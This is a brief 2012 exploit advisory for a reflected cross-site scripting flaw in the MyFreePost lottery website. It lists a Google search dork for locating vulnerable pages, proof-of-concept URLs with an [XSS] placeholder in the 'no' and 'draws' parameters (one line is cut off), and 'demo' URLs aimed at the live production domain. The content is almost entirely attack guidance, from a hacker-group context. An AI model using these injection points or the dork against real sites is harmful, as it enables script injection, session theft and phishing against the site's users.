MyFreePost suffers from a cross-site scripting vulnerability. Note that these findings house site-specific data.
##################################################
# Exploit Title: myfreepost (searchbrief.php) <= XSS Vulnerability
# Date: 07/10/2012
# Author: Ryuzaki Lawlet
# Web/Blog: http://justryuz.blogspot.com
# 3Mail: ryuzaki_l@y7mail.com
# Category: webapps
# Google dork: fsearchbrief.php?no=
# Tested on: Linux
+---------------------------------------------------+
[~]Exploit/p0c :
http://localhost/my4D_searchbrief.php?no=[XSS]
http://localhost/sgTOTO_freq.php?draws=[
[~] Demo
http://my.myfreepost.com/my4D_searchbrief.php?no=[xss]
http://www.myfreepost.com/lottery/index.php/us/arizonalottery/pick3/search_brief/?no=[XSS]
[~] Image
http://1.bp.blogspot.com/-OKZTASS-9R4/UHCUi4fyDPI/AAAAAAAAApY/j2593IXcj38/s1600/xss.png
+---------------------------------------------------+
Greetz to : ./CyberSEC